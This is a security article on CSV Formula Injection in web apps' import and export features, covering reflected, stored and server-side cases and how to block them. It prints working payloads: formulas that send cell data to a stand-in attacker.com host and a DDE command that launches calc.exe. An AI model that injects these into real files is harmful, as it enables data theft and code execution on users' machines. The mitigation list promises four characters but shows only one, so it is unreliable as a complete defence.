A few years back I was testing an application which had CSV export functionality and I noticed something weird. When I clicked the export button the application submitted a request with the CSV data in the POST body. That data was then used to generate the file which was downloaded. This behavior piqued my interest so I began to play with the request, and I confirmed that anything I supplied in the POST body would be reflected in the downloaded file. This began my research into an often over-looked, but dangerous vulnerability: CSV Formula Injection.
By design, most spreadsheet applications such as Microsoft Excel allow users to create formulas within cells. This allows the application to do mathematic calculations for you, which is pretty much the main purpose of a spreadsheet. Unfortunately, this functionality can be easily exploited by attackers and the results can be catastrophic. With a simple injection, an attacker can exfiltrate the contents of a file to a remote server or even execute code on the victim’s machine. CSV Formula Injection occurs when untrusted input is embedded within CSV files which could be interpreted by the spreadsheet application as formulas to be computed.
How Attackers Can Use Your Server to Pwn Users
Many web applications have functionality that allow users to import and export data in CSV format and from my experience, almost none of them perform any sort of validation on the data contained within the file. Why would they? According to the RFC:
"CSV files contain passive text data that should not pose any risks. However, it is possible in theory that malicious binary data may be included in order to exploit potential buffer overruns in the program processing CSV data. Additionally, private data may be shared via this format (which of course applies to any text data)."
So if the RFC says the data is passive and essentially poses no risk, why would you not trust that all CSV data is safe? Well, to put it plainly, the RFC is incorrect.
As I mentioned earlier, most spreadsheet applications allow users to create formulas which perform calculations. However, what most people don’t know is that these formulas are capable of a lot more. You are able to, for instance, include hyperlinks within a CSV file. An attacker can use this to create a malicious payload which is capable of exfiltrating data to a remote server. For example, an attacker could place the following formula into a CSV file:
=HYPERLINK("https://www.attacker.com?leak="&A2&B2,"Error: Click here for additional information")
This payload plays on the trust relationship that a victim will have with the server and the content provided by it. Once this payload has been placed, the attacker just has to wait for their victim to take the bait. When the victim downloads and opens the file, they will see the attacker’s error message and, given that the file came from a trusted source, will likely click on the cell to investigate the error:
Figure 1 - When the user opens the file they will see the attacker "Error" message displayed as valid content.
Once the victim clicks on the link, their browser will open and submit a request to the attacker’s domain along with the exfiltrated values from the specified cells:
Figure 2 - The user's data being exfiltrated to the attackers domain.
While this particular attack method is a bit clunky, it is primarily to show that the “passive” data included in a CSV file can easily be used for nefarious ends. More refined injections exist and are capable of silently exfiltrating data. For example, the following code will quietly exfiltrate content from a Google Sheets file:
=IMPORTXML(CONCAT(""http://attacker.com?leak="", CONCATENATE(A2:B2)), ""//a"")
It is important to note: these injections do not raise any warning from the spreadsheet application. As far as the application is concerned, all of the data in the file is safe.
In addition to being able to exfiltrate data, attackers can also exploit CSV formulas to execute malicious code on a victim’s computer. Once again, this attack leverages the formula functionality, but this time the following injection will execute code which launches the victim’s calculator:
Figure 3 - The victim's Calculator application being launched by an Excel Formula.
Now, to be fair, modern implementations of Microsoft Excel do present the user with the following warnings:
Figure 4 - Warning messages displayed prior to launching executables.
However, we are again talking about data which has been received from a trusted source. Therefore, the probability that a victim will accept these warnings and allow the formula to run is greatly increased. Also, if the attacker couples this exploit with a well-crafted social engineering attack, they will almost undoubtedly succeed. Now what happens if the payload doesn’t launch the calculator, but instead installs a keylogger or a reverse shell? And what if the victim is on a corporate network with access to sensitive internal data? Suddenly this “passive” CSV data poses a very real risk.
The Attack Surface
During the past few years I have encountered three different ways in which I have been able to exploit this vulnerability: Reflected, Stored, and Server-Side Execution.
Reflected: This is the most common method of exploiting CSV Formula Injection which I have encountered. Reflected CSV Formula Injection occurs when an application uses data supplied from a request to generate a CSV file which the user downloads. Take, for example the following GET request:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
Similar to Reflected Cross-Site Scripting, an attacker would simply need to trick a victim into submitting this request containing the malicious payload. An example would be a link in an email, forum post, blog article, etc. This attack will likely require the attacker to utilize this vulnerability in conjunction with a social engineering attack such as spearfishing in order to be successful. The attacker would have to convince the victim that the link and subsequent downloaded file are trustworthy and legitimate. However, once the attacker’s payload has been delivered and executed, the repercussions could be devastating.
Stored: This attack scenario, though less common, is still fairly prevalent and has a greater probability of success. Stored CSV Formula Injection occurs either when user supplied data is stored in an application and later used to generate a CSV file, or when users are allowed to upload files containing CSV data which can later be downloaded by other users. A common example is administrative functionality with which an Admin is able to export a list of users to a CSV file. If a malicious user changes their name to “=cmd|’/C calc.exe’!Z0” then once the Admin exports the user list and opens this file, the attacker’s payload will execute.
Another common example is seen in applications which enable users to upload and share documents, such as collaboration applications. In this scenario, the attacker simply needs to create a malicious CSV file containing their payload, upload this file to the server, and then wait for their victims to download and open it. Again, in both scenarios the attacker is able to play off the trust relationship which users have with the application. The data is coming from the trusted application, so why wouldn’t it be safe?
Server-Side Execution: This final attack scenario is something I have only encountered once, but I figured it is worth mentioning. In one application which I tested, users were allowed to upload CSV files. These files could then be rendered and viewed in the application, typically using a 3rd party utility/application, or by embedding the user-supplied data into the webpage without properly sanitizing the data. This allowed me to place malicious code in the CSV file which resulted in Cross-Site Scripting (attempts at Remote Code Execution were not successful in this case, but this vulnerability could have led to RCE).
Shut it Down
Now that we have seen how attackers can use an application’s CSV import/export functionality to cause some pretty serious damage, I want to go over how to stop these attacks. Thankfully, preventing this attack is as simple as blocking a few key characters. All formulas require one of four special characters, and if you prevent these then you mitigate this vulnerability:
Equals to (=)
These characters can either be sanitized (similar to XSS prevention) or the server can check the content of the uploaded file before allowing it to be uploaded, rejecting any file containing the disallowed characters. This can help ensure the attacker’s payload will never get successfully delivered. However, it is important to note that this will prevent any CSV file containing formulas; this includes benign formulas.